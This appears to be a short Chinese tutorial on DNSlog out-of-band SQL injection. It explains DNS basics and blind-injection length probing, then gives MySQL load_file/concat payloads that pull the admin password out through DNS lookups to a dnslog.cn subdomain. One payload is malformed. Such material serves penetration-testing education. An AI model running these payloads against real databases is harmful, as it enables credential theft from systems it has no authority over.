网站导航
> 文档中心 > DNS_LOG注入

DNS_LOG注入

网友: 文档中心 2022-05-20 22:34:47

目录

DNS

    DNS协议

    IP

    域名

DNS_LOG注入

    特点

    使用场景

    DNS_LOG注入关键函数

    读的语法

    一份渗透测试报告

DNS

DNS协议:作用是将域名 -->  IP 

IP:电脑在网络的位置。

223.73.115.237

域名:IP的外号。

www.chenchan.com

打开host文件.

ip后增加域名.

打开浏览器后访问,访问成功.

原理:我们输入完http://www.chenchan.com/这个域名之后,咱们电脑会先访问host文件,就会将www.chenchan.com --> 192.168.189.128,然后访问这个IP。

http://dnslog.cn/ ,一个DNS解析记录的日志网站。

DNS_LOG注入

DNS_LOG注入:利用DNS解析配合日志记录,将数据库里面的数据拿出来。

特点:能够将盲注变成显错注入。

oob:out of bind  数据外带。

使用场景:显错注入(有回显点的),盲注(没有回显点的)

盲注--> 关键点 判断

length() # 作用:显示长度

length('qingyun') --> 长度是  7

length('chenchan')  --> 长度是 8 

length(database()) --> 查询当前数据库库名的长度

id=1 and length(database())=1  ---> 无内容,就说明库名长度不是1

and length(database())=12  --> 有内容, 就说明库名长度是12

DNS_LOG注入关键函数:

load_file() # 作用是:读文件

concat() #  作用是 拼接字符串

读的语法:select load_file(concat(‘//’,(数据库语句),’.域名/1.txt’));

select load_file('//',(select database()),'.qtm0xb.dnslog.cn/1.txt');

select load_file(concat('//',(select password from admin limit 0,1),'.qtm0xb.dnslog.cn/1.txt'))

DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···

总结:

1.显错、盲注、DNSLOG注入

2.DNS、域名、IP

3.攻击流程!四步!

一份渗透测试报告

网络标签:

相关问题